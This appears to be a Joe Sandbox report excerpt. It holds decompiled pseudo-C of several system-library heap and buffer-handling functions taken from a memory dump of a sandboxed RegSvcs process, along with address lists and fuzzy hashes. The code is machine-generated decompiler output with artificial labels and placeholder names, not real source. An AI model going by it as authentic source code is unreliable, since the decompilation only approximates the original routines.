0x018f29ab
0x018f29ad
0x018f29b2
0x01935c80
0x018f29b8
0x018f29b8
0x018f29bb
0x018f29c0
0x018f29c5
0x018f29c6
0x018f29c6
0x018f29cb
0x00000000
0x00000000
0x018f29cd
0x018f29d0
0x018f29d9
0x018f29db
0x018f29dd
0x018f2a7f
0x018f2a84
0x018f2a87
0x018f2a89
0x01935ca1
0x01935ca3
0x00000000
0x018f2a8f
0x018f2a8f
0x00000000
0x018f2a8f
0x00000000
0x018f29e3
0x018f29e3
0x018f29e3
0x00000000
0x018f29e3
0x018f29dd
0x00000000
0x018f29db
0x018f29e6
0x018f29e9
0x018f29eb
0x018f29ed
0x018f29f3
0x018f29f5
0x018f29f8
0x018f29fa
0x018f2a97
0x018f2a9a
0x018f2a9d
0x018f2add
0x00000000
0x018f2a9f
0x018f2aa2
0x018f2aa5
0x018f2aa8
0x018f2aab
0x01935cab
0x01935caf
0x01935cc5
0x01935cda
0x01935cdc
0x01935cdf
0x01935ce5
0x00000000
0x01935ceb
0x01935ced
0x01935cee
0x00000000
0x01935cee
0x01935cb1
0x01935cb4
0x01935cb9
0x01935cbb
0x00000000
0x01935cbd
0x01935cbd
0x00000000
0x01935cbd
0x01935cbb
0x018f2ab1
0x018f2ab1
0x018f2ac4
0x018f2ac6
0x018f2ac6
0x00000000
0x018f2ac6
0x018f2aab
0x00000000
0x018f2a00
0x018f2a09
0x018f2a0e
0x018f2a21
0x018f2a24
0x018f2a35
0x018f2a3a
0x018f2a3d
0x018f2a42
0x018f2a59
0x018f2a59
0x018f2a5c
0x018f2a5f
0x018f2a5f
0x018f29fa
0x018f29f3
0x018f2a64
0x018f2a64
0x018f2a6b
0x018f2a6b
0x018f2a6d
0x018f2a72
0x00000000

Memory Dump Source

Source File: 00000008.00000002.357578036.00000000018A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true

Associated: 00000008.00000002.359332215.00000000019BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.359384313.00000000019BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4b249386e639037a6031855b7e29323c35b4330647858772174c358663e32a0c
Instruction ID: 902b091c151d87eda9ef6783d2910ed42b9697eb1d23a0c77efb36086e1feff7
Opcode Fuzzy Hash: 4b249386e639037a6031855b7e29323c35b4330647858772174c358663e32a0c
Instruction Fuzzy Hash: AF516C71A0020ADFDF25DF99C880ADEBBB6BF48354F058119EA15AB250D335DE52CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 018F4BAD Relevance: .1, Instructions: 131
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E018F4BAD(intOrPtr __ecx, short __edx, signed char _a4, signed short _a8) {
				signed int _v8;
				short _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char _v36;
				char _v156;
				short _v158;
				intOrPtr _v160;
				char _v164;
				intOrPtr _v168;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t45;
				intOrPtr _t74;
				signed char _t77;
				intOrPtr _t84;
				char* _t85;
				void* _t86;
				intOrPtr _t87;
				signed short _t88;
				signed int _t89;

				_t83 = __edx;
				_v8 =  *0x19bd360 ^ _t89;
				_t45 = _a8 & 0x0000ffff;
				_v158 = __edx;
				_v168 = __ecx;
				if(_t45 == 0) {
					L22:
					_t86 = 6;
					L12:
					E018CCC50(_t86);
					L11:
					return E0190B640(_t86, _t77, _v8 ^ _t89, _t83, _t84, _t86);
				}
				_t77 = _a4;
				if((_t77 & 0x00000001) != 0) {
					goto L22;
				}
				_t8 = _t77 + 0x34; // 0xdce0ba00
				if(_t45 !=  *_t8) {
					goto L22;
				}
				_t9 = _t77 + 0x24; // 0x19b8504
				E018E2280(_t9, _t9);
				_t87 = 0x78;
				 *(_t77 + 0x2c) =  *( *[fs:0x18] + 0x24);
				E0190FA60( &_v156, 0, _t87);
				_t13 = _t77 + 0x30; // 0x3db8
				_t85 =  &_v156;
				_v36 =  *_t13;
				_v28 = _v168;
				_v32 = 0;
				_v24 = 0;
				_v20 = _v158;
				_v160 = 0;
				while(1) {
					_push( &_v164);
					_push(_t87);
					_push(_t85);
					_push(0x18);
					_push( &_v36);
					_push(0x1e);
					_t88 = E0190B0B0();
					if(_t88 != 0xc0000023) {
						break;
					}
					if(_t85 !=  &_v156) {
						L018E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t85);
					}
					_t84 = L018E4620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v164);
					_v168 = _v164;
					if(_t84 == 0) {
						_t88 = 0xc0000017;
						goto L19;
					} else {
						_t74 = _v160 + 1;
						_v160 = _t74;
						if(_t74 >= 0x10) {
							L19:
							_t86 = E018CCCC0(_t88);
							if(_t86 != 0) {
								L8:
								 *(_t77 + 0x2c) =  *(_t77 + 0x2c) & 0x00000000;
								_t30 = _t77 + 0x24; // 0x19b8504
								E018DFFB0(_t77, _t84, _t30);
								if(_t84 != 0 && _t84 !=  &_v156) {
									L018E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t84);
								}
								if(_t86 != 0) {
									goto L12;
								} else {
									goto L11;
								}
							}
							L6:
							 *(_t77 + 0x36) =  *(_t77 + 0x36) | 0x00004000;
							if(_v164 != 0) {
								_t83 = _t84;
								E018F4F49(_t77, _t84);
							}
							goto L8;
						}
						_t87 = _v168;
						continue;
					}
				}
				if(_t88 != 0) {
					goto L19;
				}
				goto L6;
			}

0x018f4bad
0x018f4bbf
0x018f4bc2
0x018f4bc6
0x018f4bcd
0x018f4bd9
0x019367fe
0x01936800
0x018f4ccc
0x018f4ccd
0x018f4cb7
0x018f4cc9
0x018f4cc9
0x018f4bdf
0x018f4be5
0x00000000
0x00000000
0x018f4beb
0x018f4bef
0x00000000
0x00000000
0x018f4bf5
0x018f4bf9
0x018f4c06
0x018f4c0b
0x018f4c17
0x018f4c1c
0x018f4c1f
0x018f4c25
0x018f4c33
0x018f4c3d
0x018f4c40
0x018f4c43
0x018f4c47
0x018f4c4d
0x018f4c53
0x018f4c54
0x018f4c55
0x018f4c56
0x018f4c5b
0x018f4c5c
0x018f4c63
0x018f4c6b
0x00000000
0x00000000
0x01936776
0x01936784
0x01936784
0x0193679f
0x019367a7
0x019367af
0x019367ce
0x00000000
0x019367b1
0x019367b7
0x019367b8
0x019367c1
0x019367d3
0x019367d9
0x019367dd
0x018f4c94
0x018f4c94
0x018f4c98
0x018f4c9c
0x018f4ca3
0x019367f4
0x019367f4
0x018f4cb5
0x00000000
0x00000000
0x00000000
0x00000000
0x018f4cb5
0x018f4c79
0x018f4c7e
0x018f4c89
0x018f4c8b
0x018f4c8f
0x018f4c8f
0x00000000
0x018f4c89
0x019367c3
0x00000000
0x019367c3
0x019367af
0x018f4c73
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 00000008.00000002.357578036.00000000018A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true

Associated: 00000008.00000002.359332215.00000000019BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.359384313.00000000019BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f13a3a37c2af0a5badd2f02c674e78e169a9ae6cf12977f5deb553a0fae870a7
Instruction ID: 9dda71a4d03526b49ba6e54e0287817618ff18fef2e5761e9d176525d17e5664
Opcode Fuzzy Hash: f13a3a37c2af0a5badd2f02c674e78e169a9ae6cf12977f5deb553a0fae870a7
Instruction Fuzzy Hash: 2441A835A00219ABDB21DF68C940BEA77F8EF45710F4100AAEA0DEB241D774DF84CB91

Uniqueness

Uniqueness Score: -1.00%

Function 018F4D3B Relevance: .1, Instructions: 131
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E018F4D3B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				char _v176;
				char _v177;
				char _v184;
				intOrPtr _v192;
				intOrPtr _v196;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short _t42;
				char* _t44;
				intOrPtr _t46;
				intOrPtr _t50;
				char* _t57;
				intOrPtr _t59;
				intOrPtr _t67;
				signed int _t69;

				_t64 = __edx;
				_v12 =  *0x19bd360 ^ _t69;
				_t65 = 0xa0;
				_v196 = __edx;
				_v177 = 0;
				_t67 = __ecx;
				_v192 = __ecx;
				E0190FA60( &_v176, 0, 0xa0);
				_t57 =  &_v176;
				_t59 = 0xa0;
				if( *0x19b7bc8 != 0) {
					L3:
					while(1) {
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t67 = _v192;
						 *((intOrPtr*)(_t57 + 0x10)) = _a4;
						 *(_t57 + 0x24) =  *(_t57 + 0x24) & 0x00000000;
						 *(_t57 + 0x14) =  *(_t67 + 0x34) & 0x0000ffff;
						 *((intOrPtr*)(_t57 + 0x20)) = _v196;
						_push( &_v184);
						_push(_t59);
						_push(_t57);
						_push(0xa0);
						_push(_t57);
						_push(0xf);
						_t42 = E0190B0B0();
						if(_t42 != 0xc0000023) {
							break;
						}
						if(_v177 != 0) {
							L018E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
						}
						_v177 = 1;
						_t44 = L018E4620(_t59,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v184);
						_t59 = _v184;
						_t57 = _t44;
						if(_t57 != 0) {
							continue;
						} else {
							_t42 = 0xc0000017;
							break;
						}
					}
					if(_t42 != 0) {
						_t65 = E018CCCC0(_t42);
						if(_t65 != 0) {
							L10:
							if(_v177 != 0) {
								if(_t57 != 0) {
									L018E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
								}
							}
							_t46 = _t65;
							L12:
							return E0190B640(_t46, _t57, _v12 ^ _t69, _t64, _t65, _t67);
						}
						L7:
						_t50 = _a4;
						 *((intOrPtr*)(_t67 + 0x30)) =  *((intOrPtr*)(_t57 + 0x18));
						if(_t50 != 3) {
							if(_t50 == 2) {
								goto L8;
							}
							L9:
							if(E0190F380(_t67 + 0xc, 0x18a5138, 0x10) == 0) {
								 *0x19b60d8 = _t67;
							}
							goto L10;
						}
						L8:
						_t64 = _t57 + 0x28;
						E018F4F49(_t67, _t57 + 0x28);
						goto L9;
					}
					_t65 = 0;
					goto L7;
				}
				if(E018F4E70(0x19b86b0, 0x18f5690, 0, 0) != 0) {
					_t46 = E018CCCC0(_t56);
					goto L12;
				} else {
					_t59 = 0xa0;
					goto L3;
				}
			}

0x018f4d3b
0x018f4d4d
0x018f4d53
0x018f4d58
0x018f4d65
0x018f4d6c
0x018f4d71
0x018f4d77
0x018f4d7f
0x018f4d8c
0x018f4d8e
0x018f4dad
0x018f4db0
0x018f4db7
0x018f4db8
0x018f4db9
0x018f4dba
0x018f4dbb
0x018f4dc1
0x018f4dc8
0x018f4dcc
0x018f4dd5
0x018f4dde
0x018f4ddf
0x018f4de0
0x018f4de1
0x018f4de6
0x018f4de7
0x018f4de9
0x018f4df3
0x00000000
0x00000000
0x01936c7c
0x01936c8a
0x01936c8a
0x01936c9d
0x01936ca7
0x01936cac
0x01936cb2
0x01936cb9
0x00000000
0x01936cbf
0x01936cbf
0x00000000
0x01936cbf
0x01936cb9
0x018f4dfb
0x01936ccf
0x01936cd3
0x018f4e32
0x018f4e39
0x01936ce0
0x01936cf2
0x01936cf2
0x01936ce0
0x018f4e3f
0x018f4e41
0x018f4e51
0x018f4e51
0x018f4e03
0x018f4e03
0x018f4e09
0x018f4e0f
0x018f4e57
0x00000000
0x00000000
0x018f4e1b
0x018f4e30
0x018f4e5b
0x018f4e5b
0x00000000
0x018f4e30
0x018f4e11
0x018f4e11
0x018f4e16
0x00000000
0x018f4e16
0x018f4e01
0x00000000
0x018f4e01
0x018f4da5
0x01936c6b
0x00000000
0x018f4dab
0x018f4dab
0x00000000
0x018f4dab

Memory Dump Source

Source File: 00000008.00000002.357578036.00000000018A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true

Associated: 00000008.00000002.359332215.00000000019BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.359384313.00000000019BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9c7f8df1cb0db39bb65c9d606ed9fd7771707c739c121c12ba688634d8382b64
Instruction ID: ca2b54c6fc209000a0e7f69a647f8b222fe4b5c0fbf9a8a89719d6e0b212843c
Opcode Fuzzy Hash: 9c7f8df1cb0db39bb65c9d606ed9fd7771707c739c121c12ba688634d8382b64
Instruction Fuzzy Hash: BC419375A44318AFEB22DF18CC80B67B7A9EB55724F00009EEA49D7281D774DE448B91

Uniqueness

Uniqueness Score: -1.00%

Function 018D8A0A Relevance: .1, Instructions: 120
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E018D8A0A(intOrPtr* __ecx, signed int __edx) {
				signed int _v8;
				char _v524;
				signed int _v528;
				void* _v532;
				char _v536;
				char _v540;
				char _v544;
				intOrPtr* _v548;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t44;
				void* _t46;
				void* _t48;
				signed int _t53;
				signed int _t55;
				intOrPtr* _t62;
				void* _t63;
				unsigned int _t75;
				signed int _t79;
				unsigned int _t81;
				unsigned int _t83;
				signed int _t84;
				void* _t87;

				_t76 = __edx;
				_v8 =  *0x19bd360 ^ _t84;
				_v536 = 0x200;
				_t79 = 0;
				_v548 = __edx;
				_v544 = 0;
				_t62 = __ecx;
				_v540 = 0;
				_v532 =  &_v524;
				if(__edx == 0 || __ecx == 0) {
					L6:
					return E0190B640(_t79, _t62, _v8 ^ _t84, _t76, _t79, _t81);
				} else {
					_v528 = 0;
					E018DE9C0(1, __ecx, 0, 0,  &_v528);
					_t44 = _v528;
					_t81 =  *(_t44 + 0x48) & 0x0000ffff;
					_v528 =  *(_t44 + 0x4a) & 0x0000ffff;
					_t46 = 0xa;
					_t87 = _t81 - _t46;
					if(_t87 > 0 || _t87 == 0) {
						 *_v548 = 0x18a1180;
						L5:
						_t79 = 1;
						goto L6;
					} else {
						_t48 = E018F1DB5(_t62,  &_v532,  &_v536);
						_t76 = _v528;
						if(_t48 == 0) {
							L9:
							E01903C2A(_t81, _t76,  &_v544);
							 *_v548 = _v544;
							goto L5;
						}
						_t62 = _v532;
						if(_t62 != 0) {
							_t83 = (_t81 << 0x10) + (_t76 & 0x0000ffff);
							_t53 =  *_t62;
							_v528 = _t53;
							if(_t53 != 0) {
								_t63 = _t62 + 4;
								_t55 = _v528;
								do {
									if( *((intOrPtr*)(_t63 + 0x10)) == 1) {
										if(E018D8999(_t63,  &_v540) == 0) {
											_t55 = _v528;
										} else {
											_t75 = (( *(_v540 + 0x14) & 0x0000ffff) << 0x10) + ( *(_v540 + 0x16) & 0x0000ffff);
											_t55 = _v528;
											if(_t75 >= _t83) {
												_t83 = _t75;
											}
										}
									}
									_t63 = _t63 + 0x14;
									_t55 = _t55 - 1;
									_v528 = _t55;
								} while (_t55 != 0);
								_t62 = _v532;
							}
							if(_t62 !=  &_v524) {
								L018E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t79, _t62);
							}
							_t76 = _t83 & 0x0000ffff;
							_t81 = _t83 >> 0x10;
						}
						goto L9;
					}
				}
			}

0x018d8a0a
0x018d8a1c
0x018d8a23
0x018d8a2e
0x018d8a30
0x018d8a36
0x018d8a3c
0x018d8a3e
0x018d8a4a
0x018d8a52
0x018d8a9c
0x018d8aae
0x018d8a58
0x018d8a5e
0x018d8a6a
0x018d8a6f
0x018d8a75
0x018d8a7d
0x018d8a85
0x018d8a86
0x018d8a89
0x018d8a93
0x018d8a99
0x018d8a9b
0x00000000
0x018d8aaf
0x018d8abe
0x018d8ac3
0x018d8acb
0x018d8ad7
0x018d8ae0
0x018d8af1
0x00000000
0x018d8af1
0x018d8acd
0x018d8ad5
0x018d8afb
0x018d8afd
0x018d8aff
0x018d8b07
0x018d8b22
0x018d8b24
0x018d8b2a
0x018d8b2e
0x018d8b3f
0x018d8b78
0x018d8b41
0x018d8b52
0x018d8b54
0x018d8b5c
0x018d8b74
0x018d8b74
0x018d8b5c
0x018d8b3f
0x018d8b5e
0x018d8b61
0x018d8b64
0x018d8b64
0x018d8b6c
0x018d8b6c
0x018d8b11
0x01929cd5
0x01929cd5
0x018d8b17
0x018d8b1a
0x018d8b1a
0x00000000
0x018d8ad5
0x018d8a89

Memory Dump Source

Source File: 00000008.00000002.357578036.00000000018A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true

Associated: 00000008.00000002.359332215.00000000019BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.359384313.00000000019BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 79c3295f9f7a8e07f408c1a46eb8e37830db0d06b1c406ff538a715ca85aad0a
Instruction ID: 26421cc0e0ce850f3d08d2d487171ede04e758def5652c0d07662c89aaa9cc54
Opcode Fuzzy Hash: 79c3295f9f7a8e07f408c1a46eb8e37830db0d06b1c406ff538a715ca85aad0a
Instruction Fuzzy Hash: 0D415EB4A4032D9BDB24DF59CC88AA9B7F8EB95304F1045EAD919D7242E7709F80CF51

Uniqueness

Uniqueness Score: -1.00%

Function 0198AA16 Relevance: .1, Instructions: 120
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0198AA16(void* __ecx, intOrPtr __edx, signed int _a4, short _a8) {
				intOrPtr _v8;
				char _v12;
				signed int _v16;
				signed char _v20;
				intOrPtr _v24;
				char* _t37;
				void* _t47;
				signed char _t51;
				void* _t53;
				char _t55;
				intOrPtr _t57;
				signed char _t61;
				intOrPtr _t75;
				void* _t76;
				signed int _t81;
				intOrPtr _t82;

				_t53 = __ecx;
				_t55 = 0;
				_v20 = _v20 & 0;
				_t75 = __edx;
				_t81 = ( *(__ecx + 0xc) | _a4) & 0x93000f0b;
				_v24 = __edx;
				_v12 = 0;
				if((_t81 & 0x01000000) != 0) {
					L5:
					if(_a8 != 0) {
						_t81 = _t81 | 0x00000008;
					}
					_t57 = E0198ABF4(_t55 + _t75, _t81);
					_v8 = _t57;
					if(_t57 < _t75 || _t75 > 0x7fffffff) {
						_t76 = 0;
						_v16 = _v16 & 0;
					} else {
						_t59 = _t53;
						_t76 = E0198AB54(_t53, _t75, _t57, _t81 & 0x13000003,  &_v16);
						if(_t76 != 0 && (_t81 & 0x30000f08) != 0) {
							_t47 = E0198AC78(_t53, _t76, _v24, _t59, _v12, _t81, _a8);
							_t61 = _v20;
							if(_t61 != 0) {
								 *(_t47 + 2) =  *(_t47 + 2) ^ ( *(_t47 + 2) ^ _t61) & 0x0000000f;
								if(E0196CB1E(_t61, _t53, _t76, 2, _t47 + 8) < 0) {
									L018E77F0(_t53, 0, _t76);
									_t76 = 0;
								}
							}
						}
					}
					_t82 = _v8;
					L16:
					if(E018E7D50() == 0) {
						_t37 = 0x7ffe0380;
					} else {
						_t37 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t37 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						E0198131B(_t53, _t76, _t82, _v16);
					}
					return _t76;
				}
				_t51 =  *(__ecx + 0x20);
				_v20 = _t51;
				if(_t51 == 0) {
					goto L5;
				}
				_t81 = _t81 | 0x00000008;
				if(E0196CB1E(_t51, __ecx, 0, 1,  &_v12) >= 0) {
					_t55 = _v12;
					goto L5;
				} else {
					_t82 = 0;
					_t76 = 0;
					_v16 = _v16 & 0;
					goto L16;
				}
			}

0x0198aa1f
0x0198aa21
0x0198aa23
0x0198aa2b
0x0198aa30
0x0198aa36
0x0198aa39
0x0198aa42
0x0198aa75
0x0198aa7a
0x0198aa7c
0x0198aa7c
0x0198aa88
0x0198aa8a
0x0198aa8f
0x0198ab02
0x0198ab04
0x0198aa99
0x0198aaa8
0x0198aaaf
0x0198aab3
0x0198aacc
0x0198aad1
0x0198aad6
0x0198aae0
0x0198aaf3
0x0198aaf9
0x0198aafe
0x0198aafe
0x0198aaf3
0x0198aad6
0x0198aab3
0x0198ab07
0x0198ab0a
0x0198ab11
0x0198ab23
0x0198ab13
0x0198ab1c
0x0198ab1c
0x0198ab2b
0x0198ab44
0x0198ab44
0x0198ab51
0x0198ab51
0x0198aa44
0x0198aa47
0x0198aa4c
0x00000000
0x00000000
0x0198aa5a
0x0198aa64
0x0198aa72
0x00000000
0x0198aa66
0x0198aa66
0x0198aa68
0x0198aa6a
0x00000000
0x0198aa6a

Memory Dump Source

Source File: 00000008.00000002.357578036.00000000018A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true

Associated: 00000008.00000002.359332215.00000000019BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.359384313.00000000019BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 702fa5d1d049179799b5169bcec1b3622bc185bb93763a62bdaaaa196ea10277
Instruction ID: babbfadea88c057586631800a3e4037bd4f5c508adeafe899ec55febf8417847
Opcode Fuzzy Hash: 702fa5d1d049179799b5169bcec1b3622bc185bb93763a62bdaaaa196ea10277
Instruction Fuzzy Hash: C5310432F001096BEB15AB6ACC45BAFFBBBEFC0211F05446AE909E7251DA74CD00C690

Uniqueness

Uniqueness Score: -1.00%

Function 0198FDE2 Relevance: .1, Instructions: 116
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E0198FDE2(signed int* __ecx, signed int __edx, signed int _a4) {
				char _v8;
				signed int _v12;
				signed int _t29;
				char* _t32;
				char* _t43;
				signed int _t80;
				signed int* _t84;

				_push(__ecx);
				_push(__ecx);
				_t56 = __edx;
				_t84 = __ecx;
				_t80 = E0198FD4E(__ecx, __edx);
				_v12 = _t80;
				if(_t80 != 0) {
					_t29 =  *__ecx & _t80;
					_t74 = (_t80 - _t29 >> 4 << __ecx[1]) + _t29;
					if(__edx <= (_t80 - _t29 >> 4 << __ecx[1]) + _t29) {
						E01990A13(__ecx, _t80, 0, _a4);
						_t80 = 1;
						if(E018E7D50() == 0) {
							_t32 = 0x7ffe0380;
						} else {
							_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
						}
						if( *_t32 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
							_push(3);
							L21:
							E01981608( *((intOrPtr*)(_t84 + 0x3c)), _t56);
						}
						goto L22;
					}
					if(( *(_t80 + 0xc) & 0x0000000c) != 8) {
						_t80 = E01992B28(__ecx[0xc], _t74, __edx, _a4,  &_v8);
						if(_t80 != 0) {
							_t66 =  *((intOrPtr*)(_t84 + 0x2c));
							_t77 = _v8;
							if(_v8 <=  *((intOrPtr*)( *((intOrPtr*)(_t84 + 0x2c)) + 0x28)) - 8) {
								E0198C8F7(_t66, _t77, 0);
							}
						}
					} else {
						_t80 = E0198DBD2(__ecx[0xb], _t74, __edx, _a4);
					}
					if(E018E7D50() == 0) {
						_t43 = 0x7ffe0380;
					} else {
						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t43 == 0 || ( *( *[fs:0x30] + 0x240) & 0x00000001) == 0 || _t80 == 0) {
						goto L22;
					} else {
						_push((0 | ( *(_v12 + 0xc) & 0x0000000c) != 0x00000008) + 2);
						goto L21;
					}
				} else {
					_push(__ecx);
					_push(_t80);
					E0198A80D(__ecx[0xf], 9, __edx, _t80);
					L22:
					return _t80;
				}
			}

0x0198fde7
0x0198fde8
0x0198fdec
0x0198fdee
0x0198fdf5
0x0198fdf7
0x0198fdfc
0x0198fe19
0x0198fe22
0x0198fe26
0x0198fec6
0x0198fecd
0x0198fed5
0x0198fee7
0x0198fed7
0x0198fee0
0x0198fee0
0x0198feef
0x0198ff00
0x0198ff02
0x0198ff07
0x0198ff07
0x00000000
0x0198feef
0x0198fe33
0x0198fe55
0x0198fe59
0x0198fe5b
0x0198fe5e
0x0198fe69
0x0198fe6d
0x0198fe6d
0x0198fe69
0x0198fe35
0x0198fe41
0x0198fe41
0x0198fe79
0x0198fe8b
0x0198fe7b
0x0198fe84
0x0198fe84
0x0198fe93
0x00000000
0x0198fea8
0x0198feba
0x00000000
0x0198feba
0x0198fdfe
0x0198fe01
0x0198fe02
0x0198fe08
0x0198ff0c
0x0198ff14
0x0198ff14

Memory Dump Source

Source File: 00000008.00000002.357578036.00000000018A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true

Associated: 00000008.00000002.359332215.00000000019BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.359384313.00000000019BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3ef4319804cf21a17d71333ba11752c881d61f5af92be3a911c0d40f229f6d46
Instruction ID: 559b5199efb19f7f17881567f27612639dfeb3c00551de6e6fec864815ae4b21
Opcode Fuzzy Hash: 3ef4319804cf21a17d71333ba11752c881d61f5af92be3a911c0d40f229f6d46
Instruction Fuzzy Hash: 45310632300645AFD722AB6CC848F6ABBE9EBC5751F185458E54ECB382DB75EC41C760

Uniqueness

Uniqueness Score: -1.00%

Function 0198EA55 Relevance: .1, Instructions: 111
COMMON

Download Yara Rule

C-Code - Quality: 70%

			E0198EA55(intOrPtr* __ecx, char __edx, signed int _a4) {
				signed int _v8;
				char _v12;
				intOrPtr _v15;
				char _v16;
				intOrPtr _v19;
				void* _v28;
				intOrPtr _v36;
				void* __ebx;
				void* __edi;
				signed char _t26;
				signed int _t27;
				char* _t40;
				unsigned int* _t50;
				intOrPtr* _t58;
				unsigned int _t59;
				char _t75;
				signed int _t86;
				intOrPtr _t88;
				intOrPtr* _t91;

				_t75 = __edx;
				_t91 = __ecx;
				_v12 = __edx;
				_t50 = __ecx + 0x30;
				_t86 = _a4 & 0x00000001;
				if(_t86 == 0) {
					E018E2280(_t26, _t50);
					_t75 = _v16;
				}
				_t58 = _t91;
				_t27 = E0198E815(_t58, _t75);
				_v8 = _t27;
				if(_t27 != 0) {
					E018CF900(_t91 + 0x34, _t27);
					if(_t86 == 0) {
						E018DFFB0(_t50, _t86, _t50);
					}
					_push( *((intOrPtr*)(_t91 + 4)));
					_push( *_t91);
					_t59 =  *(_v8 + 0x10);
					_t53 = 1 << (_t59 >> 0x00000002 & 0x0000003f);
					_push(0x8000);
					_t11 = _t53 - 1; // 0x0
					_t12 = _t53 - 1; // 0x0
					_v16 = ((_t59 >> 0x00000001 & 1) + (_t59 >> 0xc) << 0xc) - 1 + (1 << (_t59 >> 0x00000002 & 0x0000003f)) - (_t11 + ((_t59 >> 0x00000001 & 1) + (_t59 >> 0x0000000c) << 0x0000000c) & _t12);
					E0198AFDE( &_v12,  &_v16);
					asm("lock xadd [eax], ecx");
					asm("lock xadd [eax], ecx");
					E0198BCD2(_v8,  *_t91,  *((intOrPtr*)(_t91 + 4)));
					_t55 = _v36;
					_t88 = _v36;
					if(E018E7D50() == 0) {
						_t40 = 0x7ffe0388;
					} else {
						_t55 = _v19;
						_t40 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
					}
					if( *_t40 != 0) {
						E0197FE3F(_t55, _t91, _v15, _t55);
					}
				} else {
					if(_t86 == 0) {
						E018DFFB0(_t50, _t86, _t50);
						_t75 = _v16;
					}
					_push(_t58);
					_t88 = 0;
					_push(0);
					E0198A80D(_t91, 8, _t75, 0);
				}
				return _t88;
			}

0x0198ea55
0x0198ea66
0x0198ea68
0x0198ea6c
0x0198ea6f
0x0198ea72
0x0198ea75
0x0198ea7a
0x0198ea7a
0x0198ea7e
0x0198ea80
0x0198ea85
0x0198ea8b
0x0198eab5
0x0198eabc
0x0198eabf
0x0198eabf
0x0198eaca
0x0198eace
0x0198ead0
0x0198eae4
0x0198eaeb
0x0198eaf0
0x0198eaf5
0x0198eb09
0x0198eb0d
0x0198eb1d
0x0198eb2d
0x0198eb38
0x0198eb3d
0x0198eb41
0x0198eb4a
0x0198eb60
0x0198eb4c
0x0198eb52
0x0198eb59
0x0198eb59
0x0198eb68
0x0198eb71
0x0198eb71
0x0198ea8d
0x0198ea8f
0x0198ea92
0x0198ea97
0x0198ea97
0x0198ea9b
0x0198ea9c
0x0198ea9e
0x0198eaa6
0x0198eaa6
0x0198eb7e

Memory Dump Source

Source File: 00000008.00000002.357578036.00000000018A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true

Associated: 00000008.00000002.359332215.00000000019BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.359384313.00000000019BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f5f831e91637f778ab1786019c0fe1c1c634a5059deceac50859eb6d9a86e6aa
Instruction ID: 111018c2711a212445909821f119be3c26b8f96db6c6d24c99e66459ae80245f
